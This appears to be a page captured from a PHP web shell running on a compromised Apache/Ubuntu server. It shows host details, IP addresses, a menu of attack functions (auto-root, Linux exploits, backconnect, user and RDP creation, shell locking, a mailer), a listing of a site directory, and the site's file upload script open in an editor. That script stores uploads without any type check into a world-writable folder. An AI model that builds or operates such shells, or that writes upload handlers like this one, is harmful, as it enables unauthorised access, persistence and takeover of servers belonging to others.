Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 18.117.11.13
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
pms /
[ HOME SHELL ]
Name
Size
Permission
Action
.git
[ DIR ]
drwxrwxr-x
PHPExcel
[ DIR ]
drwxrwxr-x
Reports
[ DIR ]
drwxrwxr-x
html
[ DIR ]
drwxrwxr-x
images
[ DIR ]
drwxrwxr-x
invoice
[ DIR ]
drwxrwxrwx
js
[ DIR ]
drwxrwxr-x
libs
[ DIR ]
drwxrwxr-x
src
[ DIR ]
drwxrwxr-x
.pms.php
3.61
KB
-rw-r--r--
MainPage.html
10.68
KB
-rwxrwxr-x
app.php
429
B
-rwxrwxr-x
cconfig.php
895
B
-rwxrwxr-x
index.html
5.69
KB
-rwxrwxr-x
index_old.html
4.55
KB
-rw-rw-r--
upload_file.php
471
B
-rwxrwxr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : upload_file.php
<?php $file_resp=""; if ( 0 < $_FILES['file']['error'] ) { echo 'Error: ' . $_FILES['file']['error'] . '<br>'; $file_resp="Failed to upload file!"; } else { $time = date("Ymdhms"); $name = $time.$_FILES['file']['name']; $file_name = str_replace($_FILES['file']['name'],$name , $_FILES['file']['name']); // $path = 'invoice/'.$file_name; move_uploaded_file($_FILES['file']['tmp_name'], 'invoice/'.$file_name); } echo $path; ?>
Close